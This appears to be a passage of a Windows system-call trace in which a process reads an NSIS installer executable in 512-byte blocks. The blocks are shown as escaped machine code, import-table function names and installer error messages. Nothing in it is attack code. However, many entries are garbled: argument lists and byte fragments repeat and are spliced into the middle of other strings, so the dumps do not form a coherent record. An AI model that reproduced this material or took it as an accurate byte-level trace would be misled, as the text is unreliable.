\322B\0D\0\0\0\377\25tp@\03\311\203\370\377t\4\250\20u\3\211M\14\215E\360Ph \322B\0\377u\14QQQQQ\377u\10Q\377\25\340p@\0\205\300t\14\377u\364\377\25lp@\0\213E\360\311\302\10\0\377%\360q@\0h\0\4\0\0\377t$\14\377t$\14\377", ) , ) == 0x0
 00768   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\10\0\213D$\10\213\310\201\341\377\377\17\0\203=\300\360B\0\0t\5\301\350\24u%\203=\310\360B\0\0t\6\201\361\0\0\30\0Qh \350B\0\377t$\14\3775$\360B\0\377\25\370q@\0\302\10\0\377t$\4j@\377\25\330p@\0\302\4\0U\213\354\201\354D\1\0\0S\213]\10VWS\350H\2\0\0\213}\14\211E\374\203\347\1\211}\10t\22\205\300\17\204J\1\0\0\366E\14\2\17\204\374\0\0\0\276 \312B\0SV\3505\6\0\0\205\377\213=\214p@\0t\12h \223@\0V\377\327\353\6S\350i\1\0\0h8\220@\0S\377\327S\350\23\6\0\0\213\370\215\205\274\376\377\377PV\3\373\377\25\24q@\0\213\360\203\376\377\17\204\241\0\0\0\200\275\350\376\377\377.u\22\200\275\351\376\377\377.tr\200\275\351\376\377\377\0ti\215\205\350\376\377\377PW\350\310\5\0\0\213\205\274\376\377\377\250\20t\25\213E\14\203\340\3<\3uH\377u\14S\3505\377\377\377\353=$\376PS\377\25\230p@\0S\377\25\20q@\0\205\300u \366E\14\4t\22Sj\361\350i\371\377\377j\0S\350\273\2\0\0\353\20\377\5\250\360B\0\353\10Sj\362\350O\371\377\377\215\205\274\376\377\377PV\377\25\30q@\0\205\300\17\205f\377\377\377V\377\25\34q@\0\203}\10\0t\4\200g\377\03\3669u\374t=9u\10t8S\3509\0\0\0S\377\25\344p@\0\205\300u\37\366E\14\4t\21Sj\361\350\375\370\377\377VS\350P\2\0\0\353\20\377\5\250\360B\0\353\10Sj\345\350\344\370\377\377_^[\311\302\10\0V\213t$\10V\350\365\4\0\0\3\306PV\377\25\374q@\0\2008\t\14h8\220@\0V\377\25\214p@", ) , ) == 0x0
 00769   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\15:L$\10t\15P\377\25|q@\0\212\10\204\311u\355\302\10\0V\213t$\10V\350\255\4\0\0\3\306\2008\t\14PV\377\25\374q@\0;\306w\357\200 \0^\302\4\0\213L$\4\212\1\14 f\2019\\t\22\377t$\24\212\347\200$7\0V\377\25hp@\0\205\300\210\347t\33V\377\25|q@\0\213\360V\350p\3\0\0;\307}\3243\300_^[\302\10\0\213\306\353\366\213L$\4V\213t$\20\205\366~\17\213D$\14+\301\212\24\10\210\21ANu\367^\302\14\0\377t$\4\377\25tp@\0\213\310j\0A\367\331\33\311#\310Q\377t$\24j\0j\1\377t$\34\377t$\34\377\25\350p@\0\302\14\0U\213\354V\213u\10Wjd_O\307E\10nsa\0\377\25\250p@\0j\323\322Y\367\361V\215E\10j\0P\377u\14\0U\12\377\25\354p@\0\205\300u", ) \377t$\24\212\347\200$7\0V\377\25hp@\0\205\300\210\347t\33V\377\25|q@\0\213\360V\350p\3\0\0;\307}\3243\300_^[\302\10\0\213\306\353\366\213L$\4V\213t$\20\205\366~\17\213D$\14+\301\212\24\10\210\21ANu\367^\302\14\0\377t$\4\377\25tp@\0\213\310j\0A\367\331\33\311#\310Q\377t$\24j\0j\1\377t$\34\377t$\34\377\25\350p@\0\302\14\0U\213\354V\213u\10Wjd_O\307E\10nsa\0\377\25\250p@\0j\323\322Y\367\361V\215E\10j\0P\377u\14\0U\12\377\25\354p@\0\205\300u", ) == 0x0
 00770   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\10\0\213\306\353\366SUVWh\4\223@\0\377\254q@\0\205\300\213t$\30t!hP\223@\0P\377\25\215E\10\307E\10\0\4\0\0P\215E\24VPS", ) , ) == 0x0
 00771   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\205\300u\14\203}\24\1t\10\203}\24\2t\2\210\36\377u\14\210\236\377\3\0\0\377\25\34p@\0^[]\302\20\0\377t$\10h\\223@\0\377t$\14\377\25\34r@\0\203\304\14\302\10\0U\213\354Q\213M\10SVW3\377\2009-\307E\374\1\0\0\0\260\12\2639u\5A\203M\374\377\20090u\34A\212\21\200\3720|\11\200\3727\177\4\260\10\2637\200\342\337\200\372Xu\3\260\20A\17\276\21A\203\3720|\14\17\276\363;\326\177\5\203\3520\353\31<\20u!\213\362\203\346\337\203\376A|\27\203\376F\177\22\203\342\7\203\302\11\17\276\360\17\257\367\3\362\213\376\353\306\213E\374\17\257\307_^[\311\302\4\0\377%\0q@\0\377%\4q@\0U\213\354\203\354\30\213E\14\205\300}\21\213\15\374\347B\0\215\4\205\4\0\0\0+\310\213\1\213\15X\360B\0SVW\215\34\10\213M\10\270\300\337B\0+\310\213\370\201\371\0\10\0\0\17\203\311\1\0\0\213}\10\203e\10\0\351\275\1\0\0\213\317+\310\201\371\0\4\0\0\17\215\267\1\0\0C\200\372\374\211]\14\17\206\216\1\0\0\17\276C\1\17\276\13\213\360\213\331\203\346\177\203\343\177\301\346\7\13\363\273\0\200\0\0\211E\360\13\303\211M\350j\2\13\313\213]\14\211E\364X\3\330\200\372\376\211M\354\17\205\376\0\0\0\203e\374\0\203e\14\0\200'\0\203}\360\4u\12\307E\374\300\223@\0\211E\14\213u\350\203\376+u\25Wh\260\223@\0h\204\223@\0h\2\0\0\200\350\11\376\377\377\203\376&u)Wht\223@\0h\204\223@\0h\2\0\0\200\350\357\375\377\377\200?\0\17\205\206\0\0\0h`\223@\0W\350\347\376\377\377\203\376%u\14h\0\4\0\0W\377\25\10q@\0\203", ) , ) == 0x0
 00772   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\300p@\0\200?\0uT\203=\244\360B\0\0\307E\14\4\0\0\0u\11\307E\14\2\0\0\0\353;\377M\14\215E\370P\213E\14\377t\205\350\3775$\360B\0\377\25lq@\0\205\300u\32W\377u\370\377\25dq@\0\377u\370\213\360\350\13\367\377\377\205\366u\13\353\3\200'\0\203}\14\0u\277\200?\0tC\203}\374\0t=\377u\374W\377\25\214p@\0\3531\200\372\375u<\203\376\33u\16\3775$\360B\0W\350\227\375\377\377\353\21\213\306\301\340\12\5\0\0C\0PW\350&\376\377\377\203\306\353\203\376\6s\6W\350X\0\0\0W\350\30\376\377\377\3\370\353 \200\372\377u\33\203\310\377+\306PW\350\11\376\377\377\353\343u\10\212\3\210\7GC\353\3\210\27G\270\300\337B\0\212\23\204\322\17\2059\376\377\377\200'\0\203}\10\0_^[t\17h\0\4\0\0P\377u\10\377\25\270p@\0\311\302\10\0SU\213-|q@\0V\213t$\20W\353\5V\377\325\213\360\200> t\366\200>\u\25\200~\1\u\17\200~\2?u\11\200~\3\u\3\203\306\4\200>\0t\14V\350\364\370\377\377\205\300t\2FF\213\336\213\376\353+<\37v"Ph\354\223@\0\350\230\370\377\377\2008\0u\22V\377\325+\306PVW\350\372\371\377\377W\377\325\213\370V\377\325\213\360\212\6\204\300u\317 \7WS\377\25\374q@\0\213\370\212\7< t\4<\u\7\200'\0;\337r\345_^\213\303][\302\4\0SV\2135,q@\0Wh\1\200\0\0\377\326\277h\322B\0W\377t$\24\377\25\24q@\0j\0\213\330\377\326\203\373\377t\13S\377\25\34q@\0\213\307\353\23\300_^[\302\4\0\314\377%tr@\0\377%pr", ) Ph\354\223@\0\350\230\370\377\377\2008\0u\22V\377\325+\306PVW\350\372\371\377\377W\377\325\213\370V\377\325\213\360\212\6\204\300u\317 \7WS\377\25\374q@\0\213\370\212\7< t\4<\u\7\200'\0;\337r\345_^\213\303][\302\4\0SV\2135,q@\0Wh\1\200\0\0\377\326\277h\322B\0W\377t$\24\377\25\24q@\0j\0\213\330\377\326\203\373\377t\13S\377\25\34q@\0\213\307\353\23\300_^[\302\4\0\314\377%tr@\0\377%pr", ) == 0x0
 00773   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\4\200\0\0"\200\0\06\200\0\0H\200\0\0\212\200\0\0z\200\0\0h\200\0\0Z\200\0\0\24\200\0\0\0\0\0\0\21\0\0\200\34w\0\0\10w\0\02w\0\0\0\0\0\0\334\177\0\0\314\177\0\0\266\177\0\0\240\177\0\0\224\177\0\0\204\177\0\0\354\177\0\0t\177\0\0\0\0\0\0\242x\0\0\276x\0\0\330x\0\0\344x\0\0\362x\0\0\0y\0\0\26y\0\0(y\0\06y\0\0Jy\0\0^y\0\0jy\0\0vy\0\0\216y\0\0\242y\0\0\270y\0\0\300y\0\0\316y\0\0\344y\0\0\364y\0\0\10z\0\0\24z\0\0"z\0\0\224x\0\0@z\0\0Xz\0\0hz\0\0\200z\0\0\224z\0\0\244z\0\0\262z\0\0\300z\0\0\320z\0\0\342z\0\0\366z\0\0\4{\0\0\30{\0\0({\0\0:{\0\0J{\0\0`{\0\0l{\0\0x{\0\0Tw\0\0^w\0\0lw\0\0~w\0\0\216w\0\0\232w\0\0~x\0\0hx\0\0Xx\0\0\254w\0\0Dx\0\04x\0\0"x\0\0\24x\0\0\376w\0\0\340w\0\0\304w\0\0\270w\0\0.z\0\0\0\0\0\0\274\200\0\0\314\200\0\0\342\200\0\0\372\200\0\0\10\201\0\0\250\200\0\0\0\0\0\04}\0\0D}\0\0P}\0\0b}\0\0r}\0\0\204}\0\0\234}\0\0\256}\0\0\272}\0\0\314}\0\0\334}\0\0\354}\0\0\376}\0\0\16~\0\0\34~\0\0.~\0\0<~\0\0H~\0\0Z~\0\0j~\0\0x~\0\0\212~\0\0\234~\0\0\256~\0\0\302~\0\0\324~\0\0\344~\0\0\366~\0\0\4\177\0\0\26\177\0\0*\177\0\0", ) \200\0\06\200\0\0H\200\0\0\212\200\0\0z\200\0\0h\200\0\0Z\200\0\0\24\200\0\0\0\0\0\0\21\0\0\200\34w\0\0\10w\0\02w\0\0\0\0\0\0\334\177\0\0\314\177\0\0\266\177\0\0\240\177\0\0\224\177\0\0\204\177\0\0\354\177\0\0t\177\0\0\0\0\0\0\242x\0\0\276x\0\0\330x\0\0\344x\0\0\362x\0\0\0y\0\0\26y\0\0(y\0\06y\0\0Jy\0\0^y\0\0jy\0\0vy\0\0\216y\0\0\242y\0\0\270y\0\0\300y\0\0\316y\0\0\344y\0\0\364y\0\0\10z\0\0\24z\0\0 (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\4\200\0\0"\200\0\06\200\0\0H\200\0\0\212\200\0\0z\200\0\0h\200\0\0Z\200\0\0\24\200\0\0\0\0\0\0\21\0\0\200\34w\0\0\10w\0\02w\0\0\0\0\0\0\334\177\0\0\314\177\0\0\266\177\0\0\240\177\0\0\224\177\0\0\204\177\0\0\354\177\0\0t\177\0\0\0\0\0\0\242x\0\0\276x\0\0\330x\0\0\344x\0\0\362x\0\0\0y\0\0\26y\0\0(y\0\06y\0\0Jy\0\0^y\0\0jy\0\0vy\0\0\216y\0\0\242y\0\0\270y\0\0\300y\0\0\316y\0\0\344y\0\0\364y\0\0\10z\0\0\24z\0\0"z\0\0\224x\0\0@z\0\0Xz\0\0hz\0\0\200z\0\0\224z\0\0\244z\0\0\262z\0\0\300z\0\0\320z\0\0\342z\0\0\366z\0\0\4{\0\0\30{\0\0({\0\0:{\0\0J{\0\0`{\0\0l{\0\0x{\0\0Tw\0\0^w\0\0lw\0\0~w\0\0\216w\0\0\232w\0\0~x\0\0hx\0\0Xx\0\0\254w\0\0Dx\0\04x\0\0"x\0\0\24x\0\0\376w\0\0\340w\0\0\304w\0\0\270w\0\0.z\0\0\0\0\0\0\274\200\0\0\314\200\0\0\342\200\0\0\372\200\0\0\10\201\0\0\250\200\0\0\0\0\0\04}\0\0D}\0\0P}\0\0b}\0\0r}\0\0\204}\0\0\234}\0\0\256}\0\0\272}\0\0\314}\0\0\334}\0\0\354}\0\0\376}\0\0\16~\0\0\34~\0\0.~\0\0<~\0\0H~\0\0Z~\0\0j~\0\0x~\0\0\212~\0\0\234~\0\0\256~\0\0\302~\0\0\324~\0\0\344~\0\0\366~\0\0\4\177\0\0\26\177\0\0*\177\0\0", ) x\0\0\24x\0\0\376w\0\0\340w\0\0\304w\0\0\270w\0\0.z\0\0\0\0\0\0\274\200\0\0\314\200\0\0\342\200\0\0\372\200\0\0\10\201\0\0\250\200\0\0\0\0\0\04}\0\0D}\0\0P}\0\0b}\0\0r}\0\0\204}\0\0\234}\0\0\256}\0\0\272}\0\0\314}\0\0\334}\0\0\354}\0\0\376}\0\0\16~\0\0\34~\0\0.~\0\0<~\0\0H~\0\0Z~\0\0j~\0\0x~\0\0\212~\0\0\234~\0\0\256~\0\0\302~\0\0\324~\0\0\344~\0\0\366~\0\0\4\177\0\0\26\177\0\0*\177\0\0", ) == 0x0
 00774   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\36}\0\0\16}\0\0\2}\0\0\360|\0\0\336|\0\0\310|\0\0\272|\0\0\256|\0\0\230|\0\0\210|\0\0||\0\0n|\0\0\|\0\0N|\0\0F|\0\06|\0\0\22|\0\0\0|\0\0\360{\0\0\336{\0\0\320{\0\0\300{\0\0\264{\0\0\250{\0\0\234{\0\0&|\0\0\0\0\0\0\232\201\0\0\204\201\0\0r\201\0\0\0\0\0\0X\201\0\0F\201\0\02\201\0\0\0\0\0\0\20\21\22\0\10\7\11\6\12\5\13\4\14\3\15\2\16\1\17\0\3\0\4\0\5\0\6\0\7\0\10\0\11\0\12\0\13\0\15\0\17\0\21\0\23\0\27\0\33\0\37\0#\0+\03\0;\0C\0S\0c\0s\0\203\0\243\0\303\0\343\0\2\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\1\0\1\0\1\0\2\0\2\0\2\0\2\0\3\0\3\0\3\0\3\0\4\0\4\0\4\0\4\0\5\0\5\0\5\0\5\0\0\0p\0p\0\0\0\1\0\2\0\3\0\4\0\5\0\7\0\11\0\15\0\21\0\31\0!\01\0A\0a\0\201\0\301\0\1\1\201\1\1\2\1\3\1\4\1\6\1\10\1\14\1\20\1\30\1 \10\1@\1`\0\0\0\0\0\0\0\0\1\0\1\0\2\0\2\0\3\0\3\0\4\0\4\0\5\0\5\0\6\0\6\0\7\0\7\0\10\0\10\0\11\0\11\0\12\0\12\0\13\0\13\0\14\0\14\0\15\0\15\0\356\24\2\0\0\0\0\0\300\0\0\0\0\0\0F\1\24\2\0\0\0\0\0\300\0\0\0\0\0\0F\13\1\0\0\0\0\0\0\300\0\0\0\0\0\0F\244t\0\0\0\0\0\0\0\0\0\0Fw\0\0(p\0\0\334t\0\0\0\0\0\0\0\0\0\0\216{\0\0`p\0\0\364u\0\0", ) , ) == 0x0
 00775   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "xq\0\0\270t\0\0\0\0\0\0\0\0\0\0\372\177\0\0\200\0\06\200\0\0H\200\0\0\212\200\0\0z\200\0\0h\200\0\0Z\200\0\0\24\200\0\0\0\0\0\0\21\0\0\200\34w\0\0\10w\0\02w\0\0\0\0\0\0\334\177\0\0\314\177\0\0\266\177\0\0\240\177\0\0\224\177\0\0\204\177\0\0\354\177\0\0t\177\0\0\0\0\0\0\242x\0\0\276x\0\0\330x\0\0\344x\0\0\362x\0\0\0y\0\0\26y\0\0(y\0\06y\0\0Jy\0\0^y\0\0jy\0\0vy\0\0\216y\0\0\242y\0\0\270y\0\0\300y\0\0\316y\0\0\344y\0\0\364y\0\0\10z\0\0\24z\0\0"z\0\0\224x\0\0@z\0\0Xz\0\0hz\0\0\200z\0\0\224z\0\0\244z\0\0\262z\0\0\300z\0\0\320z\0\0\342z\0\0\366z\0\0\4{\0\0\30{\0\0({\0\0:{\0\0J{\0\0`{\0\0l{\0\0x{\0\0Tw\0\0^w\0\0lw\0\0~w\0\0\216w\0\0\232w\0\0~x\0\0hx\0\0Xx\0\0\254w\0\0Dx\0\04x\0\0"x\0\0\24x\0\0\376w\0\0\340w\0\0\304w\0\0\270w\0\0.z\0\0\0\0\0\0\274\200\0\0\314\200\0\0\342\200\0\0\372\200\0\0\10\201\0\0\250\200\0\0\0\0\0\0", ) \200\0\06\200\0\0H\200\0\0\212\200\0\0z\200\0\0h\200\0\0Z\200\0\0\24\200\0\0\0\0\0\0\21\0\0\200\34w\0\0\10w\0\02w\0\0\0\0\0\0\334\177\0\0\314\177\0\0\266\177\0\0\240\177\0\0\224\177\0\0\204\177\0\0\354\177\0\0t\177\0\0\0\0\0\0\242x\0\0\276x\0\0\330x\0\0\344x\0\0\362x\0\0\0y\0\0\26y\0\0(y\0\06y\0\0Jy\0\0^y\0\0jy\0\0vy\0\0\216y\0\0\242y\0\0\270y\0\0\300y\0\0\316y\0\0\344y\0\0\364y\0\0\10z\0\0\24z\0\0 (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "xq\0\0\270t\0\0\0\0\0\0\0\0\0\0\372\177\0\0\200\0\06\200\0\0H\200\0\0\212\200\0\0z\200\0\0h\200\0\0Z\200\0\0\24\200\0\0\0\0\0\0\21\0\0\200\34w\0\0\10w\0\02w\0\0\0\0\0\0\334\177\0\0\314\177\0\0\266\177\0\0\240\177\0\0\224\177\0\0\204\177\0\0\354\177\0\0t\177\0\0\0\0\0\0\242x\0\0\276x\0\0\330x\0\0\344x\0\0\362x\0\0\0y\0\0\26y\0\0(y\0\06y\0\0Jy\0\0^y\0\0jy\0\0vy\0\0\216y\0\0\242y\0\0\270y\0\0\300y\0\0\316y\0\0\344y\0\0\364y\0\0\10z\0\0\24z\0\0"z\0\0\224x\0\0@z\0\0Xz\0\0hz\0\0\200z\0\0\224z\0\0\244z\0\0\262z\0\0\300z\0\0\320z\0\0\342z\0\0\366z\0\0\4{\0\0\30{\0\0({\0\0:{\0\0J{\0\0`{\0\0l{\0\0x{\0\0Tw\0\0^w\0\0lw\0\0~w\0\0\216w\0\0\232w\0\0~x\0\0hx\0\0Xx\0\0\254w\0\0Dx\0\04x\0\0"x\0\0\24x\0\0\376w\0\0\340w\0\0\304w\0\0\270w\0\0.z\0\0\0\0\0\0\274\200\0\0\314\200\0\0\342\200\0\0\372\200\0\0\10\201\0\0\250\200\0\0\0\0\0\0", ) x\0\0\24x\0\0\376w\0\0\340w\0\0\304w\0\0\270w\0\0.z\0\0\0\0\0\0\274\200\0\0\314\200\0\0\342\200\0\0\372\200\0\0\10\201\0\0\250\200\0\0\0\0\0\0", ) == 0x0
 00776   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "b}\0\0r}\0\0\204}\0\0\234}\0\0\256}\0\0\272}\0\0\314}\0\0\334}\0\0\354}\0\0\376}\0\0\16~\0\0\34~\0\0.~\0\0<~\0\0H~\0\0Z~\0\0j~\0\0x~\0\0\212~\0\0\234~\0\0\256~\0\0\302~\0\0\324~\0\0\344~\0\0\366~\0\0\4\177\0\0\26\177\0\0*\177\0\0<\177\0\0N\177\0\0\\177\0\0\36}\0\0\16}\0\0\2}\0\0\360|\0\0\336|\0\0\310|\0\0\272|\0\0\256|\0\0\230|\0\0\210|\0\0||\0\0n|\0\0\|\0\0N|\0\0F|\0\06|\0\0\22|\0\0\0|\0\0\360{\0\0\336{\0\0\320{\0\0\300{\0\0\264{\0\0\250{\0\0\234{\0\0&|\0\0\0\0\0\0\232\201\0\0\204\201\0\0r\201\0\0\0\0\0\0X\201\0\0F\201\0\02\201\0\0\0\0\0\08\0ImageList_Destroy\04\0ImageList_AddMasked\07\0ImageList_Create\0\0COMCTL32.dll\0\0j\2MulDiv\0\0|\0DeleteFileA\0\311\0FindFirstFileA\0\0\323\0FindNextFileA\0\305\0FindClose\0\20\3SetFilePointer\0\0\253\2ReadFile\0\0\227\3WriteFile\0\224\1GetPrivateProfileStringA\0\0\234\3WritePrivateProfil", ) , ) == 0x0
 00777   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "MultiByteToWideChar\0\357\0FreeLibrary\0\230\1GetProcAddress\0\0H\2LoadLibraryA\0\0w\1GetModuleHandleA\0\0\12\3SetErrorMode\0\0R\1GetExitCodeProcess\0\0\205\3WaitForSingleObject\0\365\1GlobalFree\0\0\262\0ExpandEnvironmentStringsA\0P\1GetEnvironmentVariableA\0\266\3lstrcmpiA\0.\0CloseHandle\0\24\3SetFileTime\0V\1GetFileAttributesA\0\03\0CompareFileTime\0\320\2SearchPathA\0\255\1GetShortPathNameA\0a\1GetFullPathNameA\0\0d\2MoveFileA\0\260\3lstrcatA\0\0\377\2SetCurrentDirectoryA\0\0E\0CreateDirectoryA\0\0\16\3SetFileAttributesA\0\0I\3Sleep\0[\1GetFileSize\0u\1GetModuleFileNameA\0\0\325\1GetTickCount\0\0", ) , ) == 0x0
 00778   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "Process\0=\0CopyFileA\0\257\0ExitProcess\0\274\3lstrcpynA\0\10\1GetCommandLineA\0\351\1GetWindowsDirectoryA\0\0\313\1GetTempPathA\0\0\332\1GetUserDefaultLangID\0\0E\1GetDiskFreeSpaceA\0\0\2GlobalUnlock\0\0\371\1GlobalLock\0\0\356\1GlobalAlloc\0i\0CreateThread\0\0`\0CreateProcessA\0\0\272\2RemoveDirectoryA\0\0M\0CreateFileA\0\311\1GetTempFileNameA\0\0\5\3SetEndOfFile\0\0e\3UnmapViewOfFile\0^\2MapViewOfFile\0N\0CreateFileMappingA\0\0\271\3lstrcpyA\0\0\277\3lstrlenA\0\0\271\1GetSystemDirectoryA\0KERNEL32.dll\0\0\310\0EndPaint\0\0\274\0DrawTextA\0\342\0FillRect\0\0\377\0GetClientRect\0\15\0BeginPaint\0\0\216\0DefWindowProcA\0\0:\2Se", ) , ) == 0x0
 00779   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\223\1InvalidateRect\0\0\241\0DispatchMessageA\0\0\377\1PeekMessageA\0\0\304\0EnableWindow\0\0\14\1GetDC\0\277\1LoadImageA\0\0\177\2SetWindowLongA\0\0\21\1GetDlgItem\0\0\255\1IsWindow\0\0\344\0FindWindowExA\0=\2SendMessageTimeoutA\0\325\2wsprintfA\0\221\2ShowWindow\0\0V\2SetForegroundWindow\0\3\2PostQuitMessage\0\205\2SetWindowTextA\0\0y\2SetTimer\0\0\231\0DestroyWindow\0U\0CreateDialogParamA\0\0\341\0ExitWindowsEx\0*\0CharNextA\0\236\0DialogBoxParamA\0\366\0GetClassInfoA\0`\0CreateWindowExA\0\230\2SystemParametersInfoA\0\25\2RegisterClassA\0\0\306\0EndDialog\00\2ScreenToClient\0\0t\1GetWindowRect\0F\2SetClassLongA\0\256\1IsWind", ) , ) == 0x0
 00780   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "SetWindowPos\0\0Z\1GetSysColor\0n\1GetWindowLongA\0\0\271\1LoadCursorA\0L\2SetCursor\08\0CheckDlgButton\0\0<\1GetMessagePos\0\267\1LoadBitmapA\0\33\0CallWindowProcA\0\261\1IsWindowVisible\0B\0CloseClipboard\0\0I\2SetClipboardData\0\0\301\0EmptyClipboard\0\0\365\1OpenClipboard\0\243\2TrackPopupMenu\0\0\10\0AppendMenuA\0^\0CreatePopupMenu\0]\1GetSystemMetrics\0\0R\2SetDlgItemTextA\0\23\1GetDlgItemTextA\0\336\1MessageBoxA\0-\0CharPrevA\0USER32.dll\0\0\16\2SelectObject\0\0<\2SetTextColor\0\0\26\2SetBkMode\0:\0CreateFontIndirectA\0)\0CreateBrushIndirect\0\217\0DeleteObject\0\0k\1GetDeviceCaps\0\25\2SetBkC", ) , ) == 0x0
 00781   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "dll\0\331\1RegEnumValueA\0\325\1RegEnumKeyA\0\354\1RegQueryValueExA\0\0\371\1RegSetValueExA\0\0\315\1RegCreateKeyExA\0\311\1RegCloseKey\0\322\1RegDeleteValueA\0\320\1RegDeleteKeyA\0\342\1RegOpenKeyExA\0ADVAPI32.dll\0\0\232\0SHFileOperationA\0\0\7\1ShellExecuteA\0y\0SHBrowseForFolderA\0\0\274\0SHGetPathFromIDListA\0\0\267\0SHGetMalloc\0\303\0SHGetSpecialFolderLocation\0\0SHELL32.dll\0\20\0CoCreateInstance\0\0\4\1OleUninitialize\0\355\0OleInitialize\0ole32.dll\0\12\0VerQueryValueA\0\0\0\0GetFileVersionInfoA\0\1\0GetFileVersionInfoSizeA\0VERSION.dll\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x0
 00782   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\0\0\1\0\3\0\7\0\17\0\37\0?\0\177\0\377\0\377\1\377\3\377\7\377\17\377\37\377?\377\177\377\377\0\0\11\0\0\0\5\0\0\0\240\360B\0\35 @\0\6\0\0\0\\0\0\0%s %s\0\0\0->\0\0\377\377\377\377\0\0\0\0The installer you are trying to use is corrupted or incomplete.\12This could be the result of a damaged disk, a failed download or a virus.\12\12You may want to contact the author of this installer to obtain a new copy.\12\12It may be possible to skip this check using the /NCRC command line switch\12(NOT RECOMMENDED).\0verifying installer: %d%%\0\0\0Error launching installer\0\0\0... %d%%\0\0\0\0A~NSISu_.exe\0\0\0\0SeShutdownPrivilege\0AdjustTo", ) , ) == 0x0
 00783   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "s\0\0\0LookupPrivilegeValueA\0\0\0OpenProcessToken\0\0\0\0ADVAPI32.dll\0\0\0\0 _?=\0\0\0\0" \0\0\Temp\0\0\0NSIS Error\0\0Error writing temporary file. Make sure your temp folder is valid.\0\0\377\377\377\377\27K@\0kR@\0*N@\0\345]@\0\343M@\0\377\377\377\377\6\0\0\0RichEdit20A\0RichEd20.dll\0\0\0\0.exe\0\0\0\0open\0\0\0\0GetDiskFreeSpaceExA\0KERNEL32.dll\0\0\0\0%d.%d%s%s\0\0\0\*.*\0\0\0\0\12[\0\0[Rename]\15\12\0\0\wininit.ini\0\0\0\0%s=%s\15\12\0MoveFileExA\0%d\0\0C:\Program Files\0\0\0\0ProgramFilesDir\0Software\Microsoft\Windows\CurrentVersion\0\0\0CommonFilesDir\0\0\Microsoft\Internet Explorer\Quick Launch\0\0\0*?|<>/":", )  \0\0\Temp\0\0\0NSIS Error\0\0Error writing temporary file. Make sure your temp folder is valid.\0\0\377\377\377\377\27K@\0kR@\0*N@\0\345]@\0\343M@\0\377\377\377\377\6\0\0\0RichEdit20A\0RichEd20.dll\0\0\0\0.exe\0\0\0\0open\0\0\0\0GetDiskFreeSpaceExA\0KERNEL32.dll\0\0\0\0%d.%d%s%s\0\0\0\*.*\0\0\0\0\12[\0\0[Rename]\15\12\0\0\wininit.ini\0\0\0\0%s=%s\15\12\0MoveFileExA\0%d\0\0C:\Program Files\0\0\0\0ProgramFilesDir\0Software\Microsoft\Windows\CurrentVersion\0\0\0CommonFilesDir\0\0\Microsoft\Internet Explorer\Quick Launch\0\0\0*?|<>/ (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "s\0\0\0LookupPrivilegeValueA\0\0\0OpenProcessToken\0\0\0\0ADVAPI32.dll\0\0\0\0 _?=\0\0\0\0" \0\0\Temp\0\0\0NSIS Error\0\0Error writing temporary file. Make sure your temp folder is valid.\0\0\377\377\377\377\27K@\0kR@\0*N@\0\345]@\0\343M@\0\377\377\377\377\6\0\0\0RichEdit20A\0RichEd20.dll\0\0\0\0.exe\0\0\0\0open\0\0\0\0GetDiskFreeSpaceExA\0KERNEL32.dll\0\0\0\0%d.%d%s%s\0\0\0\*.*\0\0\0\0\12[\0\0[Rename]\15\12\0\0\wininit.ini\0\0\0\0%s=%s\15\12\0MoveFileExA\0%d\0\0C:\Program Files\0\0\0\0ProgramFilesDir\0Software\Microsoft\Windows\CurrentVersion\0\0\0CommonFilesDir\0\0\Microsoft\Internet Explorer\Quick Launch\0\0\0*?|<>/":", ) , ) == 0x0
